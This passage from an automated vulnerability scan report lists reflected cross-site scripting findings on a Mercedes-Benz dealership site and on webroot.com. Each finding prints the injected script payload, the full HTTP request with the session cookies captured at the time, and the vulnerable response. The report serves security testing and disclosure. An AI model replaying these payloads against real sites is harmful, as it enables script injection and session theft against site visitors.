Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36832

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear24ae3<script>alert(1)</script>9446c4033ba Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.191. http://www.theautomastermercedesbenz.com/dealership/about.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /dealership/about.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adac1"><script>alert(1)</script>b126d4f3216 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.30.7.1302974169538

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:39 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.192. http://www.theautomastermercedesbenz.com/financing/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /financing/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ad6"><script>alert(1)</script>1eed9a4dd1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.5.6.1302973388995

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14278
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:05:52 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.193. http://www.theautomastermercedesbenz.com/linkout/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bc8"><script>alert(1)</script>504fe4ad92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm?url=http://www.dealer.com HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14366
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:11:28 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
mg src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.194. http://www.theautomastermercedesbenz.com/linkout/index.htm [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6ea4'%3balert(1)//ee04aa6c904 was submitted in the url parameter. This input was echoed as f6ea4';alert(1)//ee04aa6c904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkout/index.htm?url=http://www.dealer.comf6ea4'%3balert(1)//ee04aa6c904 HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:10:39 GMT
Connection: close
Content-Length: 18132

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<![CDATA[*/
           
   jQuery(function () {
       $('#linkOutLink').click(function () {
           var onTrack = function () { document.location.href = 'http://www.dealer.comf6ea4';alert(1)//ee04aa6c904'; };

           $(this).unbind('click').html('<span>
...[SNIP]...
4.195. http://www.theautomastermercedesbenz.com/new-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /new-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6623"><script>alert(1)</script>fdaaeb1000e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/financing/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.10.3.1302973397616

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14282
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:08:08 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.196. http://www.theautomastermercedesbenz.com/specials/finance.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /specials/finance.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e55"><script>alert(1)</script>ddb4d93f836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973629.1302976747.3; __utmc=124194511; __utmb=124194511.3.7.1302979441461

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:46:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
g src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0
...[SNIP]...
4.197. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fbd"><script>alert(1)</script>ad12aacef3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14373
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:01:18 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
"http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.198. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBbodystyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload ae6b1<script>alert(1)</script>43130dd7918 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clearae6b1<script>alert(1)</script>43130dd7918&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37157

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz clearae6b1<script>alert(1)</script>43130dd7918 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.199. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmake parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 5c1f3<script>alert(1)</script>161a7b5aa82 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37181

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.200. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmodel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload e5131<script>alert(1)</script>a0d520f6586 was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=cleare5131<script>alert(1)</script>a0d520f6586&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz cleare5131<script>alert(1)</script>a0d520f6586 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.201. http://www.webroot.com/En_US/business-antispyware-ce-with-antivirus.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-antispyware-ce-with-antivirus.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a611a"-alert(1)-"edea93188f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-antispyware-ce-with-antivirus.html?a611a"-alert(1)-"edea93188f=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
